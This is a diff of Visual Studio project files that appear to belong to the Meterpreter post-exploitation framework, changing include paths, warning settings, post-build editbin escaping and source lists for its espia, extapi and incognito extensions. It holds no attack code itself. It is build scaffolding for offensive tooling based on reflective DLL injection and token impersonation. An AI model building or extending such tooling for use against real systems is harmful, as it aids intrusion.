<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_ESPIA_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -460,7 +460,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</MinimumRequiredVersion>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -506,4 +506,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
</Project>

36
c/meterpreter/workspace/ext_server_extapi/ext_server_extapi.vcxproj
View File

@ -106,7 +106,7 @@
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\source\extensions\extapi;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\extapi;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_EXTAPI_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@ -125,7 +125,7 @@
<TargetMachine>MachineX86</TargetMachine>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -135,7 +135,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\source\extensions\extapi;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\extapi;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_EXTAPI_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@ -154,7 +154,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<TargetMachine>MachineX86</TargetMachine>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -175,7 +175,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<AdditionalIncludeDirectories>..\..\source\extensions\extapi;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\extapi;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<TreatLinkerWarningAsErrors>true</TreatLinkerWarningAsErrors>
</ClCompile>
<Link>
@ -188,7 +188,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<TargetMachine>MachineX64</TargetMachine>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -209,7 +209,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<AdditionalIncludeDirectories>..\..\source\extensions\extapi;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\extapi;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<TreatLinkerWarningAsErrors>true</TreatLinkerWarningAsErrors>
</ClCompile>
<Link>
@ -223,7 +223,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<TargetMachine>MachineX64</TargetMachine>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -235,7 +235,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\extensions\extapi;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\extapi;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_EXTAPI_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -273,7 +273,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<Profile>false</Profile>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -285,7 +285,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\extensions\extapi;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\extapi;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_EXTAPI_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -323,7 +323,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<Profile>false</Profile>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -338,7 +338,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\extensions\extapi;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\extapi;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_EXTAPI_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -373,7 +373,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<Profile>false</Profile>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -388,7 +388,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\extensions\extapi;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\extapi;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_EXTAPI_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -423,7 +423,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<Profile>false</Profile>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -431,6 +431,8 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="..\..\source\extensions\extapi\adsi.c" />
<ClCompile Include="..\..\source\extensions\extapi\adsi_interface.cpp" />
<ClCompile Include="..\..\source\extensions\extapi\clipboard.c" />
<ClCompile Include="..\..\source\extensions\extapi\clipboard_image.cpp" />
<ClCompile Include="..\..\source\extensions\extapi\extapi.c" />
@ -438,6 +440,8 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ClCompile Include="..\..\source\extensions\extapi\window.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="..\..\source\extensions\extapi\adsi.h" />
<ClInclude Include="..\..\source\extensions\extapi\adsi_interface.h" />
<ClInclude Include="..\..\source\extensions\extapi\clipboard.h" />
<ClInclude Include="..\..\source\extensions\extapi\clipboard_image.h" />
<ClInclude Include="..\..\source\extensions\extapi\extapi.h" />

42
c/meterpreter/workspace/ext_server_incognito/ext_server_incognito.vcxproj
View File

@ -130,7 +130,7 @@
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\source\extensions\incognito;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\incognito;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@ -139,6 +139,7 @@
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<TreatLinkerWarningAsErrors>true</TreatLinkerWarningAsErrors>
<TreatWarningAsError>true</TreatWarningAsError>
</ClCompile>
<Link>
<AdditionalOptions>netapi32.lib mpr.lib %(AdditionalOptions)</AdditionalOptions>
@ -152,7 +153,7 @@
</MinimumRequiredVersion>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -162,7 +163,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\source\extensions\incognito;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\incognito;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@ -171,6 +172,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<TreatLinkerWarningAsErrors>true</TreatLinkerWarningAsErrors>
<TreatWarningAsError>true</TreatWarningAsError>
</ClCompile>
<Link>
<AdditionalOptions>netapi32.lib mpr.lib %(AdditionalOptions)</AdditionalOptions>
@ -184,7 +186,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</MinimumRequiredVersion>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -197,7 +199,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<AdditionalIncludeDirectories>..\..\source\extensions\incognito;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\incognito;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -211,6 +213,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<BufferSecurityCheck>false</BufferSecurityCheck>
<TreatLinkerWarningAsErrors>true</TreatLinkerWarningAsErrors>
<TreatWarningAsError>true</TreatWarningAsError>
</ClCompile>
<Link>
<AdditionalDependencies>backcompat.lib;Netapi32.lib;Mpr.lib;metsrv.lib;%(AdditionalDependencies)</AdditionalDependencies>
@ -234,7 +237,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</MinimumRequiredVersion>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -247,7 +250,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<AdditionalIncludeDirectories>..\..\source\extensions\incognito;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\incognito;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -261,6 +264,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<BufferSecurityCheck>false</BufferSecurityCheck>
<TreatLinkerWarningAsErrors>true</TreatLinkerWarningAsErrors>
<TreatWarningAsError>true</TreatWarningAsError>
</ClCompile>
<Link>
<AdditionalDependencies>backcompat.lib;Netapi32.lib;Mpr.lib;metsrv.lib;%(AdditionalDependencies)</AdditionalDependencies>
@ -284,7 +288,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</MinimumRequiredVersion>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -297,7 +301,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\source\extensions\incognito;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\incognito;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@ -307,6 +311,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<TreatLinkerWarningAsErrors>true</TreatLinkerWarningAsErrors>
<TreatWarningAsError>true</TreatWarningAsError>
</ClCompile>
<Link>
<AdditionalDependencies>Netapi32.lib;Mpr.lib;metsrv.lib;%(AdditionalDependencies)</AdditionalDependencies>
@ -318,7 +323,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<MinimumRequiredVersion />
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -331,7 +336,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\source\extensions\incognito;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\incognito;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@ -341,6 +346,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<TreatLinkerWarningAsErrors>true</TreatLinkerWarningAsErrors>
<TreatWarningAsError>true</TreatWarningAsError>
</ClCompile>
<Link>
<AdditionalDependencies>Netapi32.lib;Mpr.lib;metsrv.lib;%(AdditionalDependencies)</AdditionalDependencies>
@ -352,7 +358,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<MinimumRequiredVersion />
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -368,7 +374,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<AdditionalIncludeDirectories>..\..\source\extensions\incognito;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\incognito;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -382,6 +388,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<BufferSecurityCheck>false</BufferSecurityCheck>
<TreatLinkerWarningAsErrors>true</TreatLinkerWarningAsErrors>
<TreatWarningAsError>true</TreatWarningAsError>
</ClCompile>
<Link>
<AdditionalDependencies>Netapi32.lib;Mpr.lib;metsrv.lib;%(AdditionalDependencies)</AdditionalDependencies>
@ -405,7 +412,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</MinimumRequiredVersion>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -421,7 +428,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<AdditionalIncludeDirectories>..\..\source\extensions\incognito;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\incognito;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -435,6 +442,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<BufferSecurityCheck>false</BufferSecurityCheck>
<TreatLinkerWarningAsErrors>true</TreatLinkerWarningAsErrors>
<TreatWarningAsError>true</TreatWarningAsError>
</ClCompile>
<Link>
<AdditionalDependencies>Netapi32.lib;Mpr.lib;metsrv.lib;%(AdditionalDependencies)</AdditionalDependencies>
@ -458,7 +466,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</MinimumRequiredVersion>
</Link>
<PostBuildEvent>
